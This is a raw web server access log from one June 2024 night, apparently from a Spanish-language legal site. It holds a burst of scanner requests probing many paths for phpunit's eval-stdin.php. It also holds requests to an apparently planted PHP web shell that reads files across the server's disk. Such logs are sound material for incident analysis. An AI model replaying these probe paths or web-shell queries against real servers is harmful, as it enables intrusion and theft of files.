201.245.192.253 - - [20/Jun/2024:02:52:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:52:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [20/Jun/2024:02:52:35 -0500] "GET /BLA/resoluciones/AUTOS%202010/0478.pdf HTTP/1.1" 200 187625
216.244.66.195 - - [20/Jun/2024:02:52:47 -0500] "GET /BLA/resoluciones/AUTOS%202010/0607.pdf HTTP/1.1" 200 163808
47.128.96.199 - - [20/Jun/2024:02:52:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0505.pdf&ft=notepad&white=1 HTTP/1.1" 200 630473
216.244.66.195 - - [20/Jun/2024:02:53:23 -0500] "GET /BLA/resoluciones/AUTOS%202010/0780.pdf HTTP/1.1" 200 189963
216.245.221.92 - - [20/Jun/2024:02:53:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:53:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.117.170 - - [20/Jun/2024:02:53:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3826.pdf&ft=notepad&white=1 HTTP/1.1" 200 736969
201.245.192.253 - - [20/Jun/2024:02:53:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [20/Jun/2024:02:53:38 -0500] "GET /BLA/boletinlegal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:38 -0500] "GET /BLA/boletinlegal/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:39 -0500] "GET /BLA/boletinlegal/vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:39 -0500] "GET /BLA/boletinlegal/vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:39 -0500] "GET /BLA/boletinlegal/vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:40 -0500] "GET /BLA/boletinlegal/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:40 -0500] "GET /BLA/boletinlegal/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:40 -0500] "GET /BLA/boletinlegal/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:41 -0500] "GET /BLA/boletinlegal/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:41 -0500] "GET /BLA/boletinlegal/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:41 -0500] "GET /BLA/boletinlegal/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:42 -0500] "GET /BLA/boletinlegal/lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:42 -0500] "GET /BLA/boletinlegal/lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:42 -0500] "GET /BLA/boletinlegal/lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:43 -0500] "GET /BLA/boletinlegal/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:43 -0500] "GET /BLA/boletinlegal/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:43 -0500] "GET /BLA/boletinlegal/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:44 -0500] "GET /BLA/boletinlegal/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:44 -0500] "GET /BLA/boletinlegal/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:45 -0500] "GET /BLA/boletinlegal/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:45 -0500] "GET /BLA/boletinlegal/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:45 -0500] "GET /BLA/boletinlegal/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:46 -0500] "GET /BLA/boletinlegal/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:46 -0500] "GET /BLA/boletinlegal/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:46 -0500] "GET /BLA/boletinlegal/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:47 -0500] "GET /BLA/boletinlegal/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:47 -0500] "GET /BLA/boletinlegal/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:47 -0500] "GET /BLA/boletinlegal/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:47 -0500] "GET /BLA/boletinlegal/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:48 -0500] "GET /BLA/boletinlegal/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:48 -0500] "GET /BLA/boletinlegal/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:48 -0500] "GET /BLA/boletinlegal/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
201.245.192.253 - - [20/Jun/2024:02:53:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:02:53:49 -0500] "GET /BLA/boletinlegal/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:49 -0500] "GET /BLA/boletinlegal/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:49 -0500] "GET /BLA/boletinlegal/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:50 -0500] "GET /BLA/boletinlegal/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [20/Jun/2024:02:53:50 -0500] "GET /BLA/boletinlegal/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
216.244.66.195 - - [20/Jun/2024:02:53:58 -0500] "GET /BLA/resoluciones/AUTOS%202010/0844.pdf HTTP/1.1" 200 181107
47.128.21.30 - - [20/Jun/2024:02:54:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages%5C&f=resize-rtl.gif&ft=notepad&white=1 HTTP/1.1" 200 149
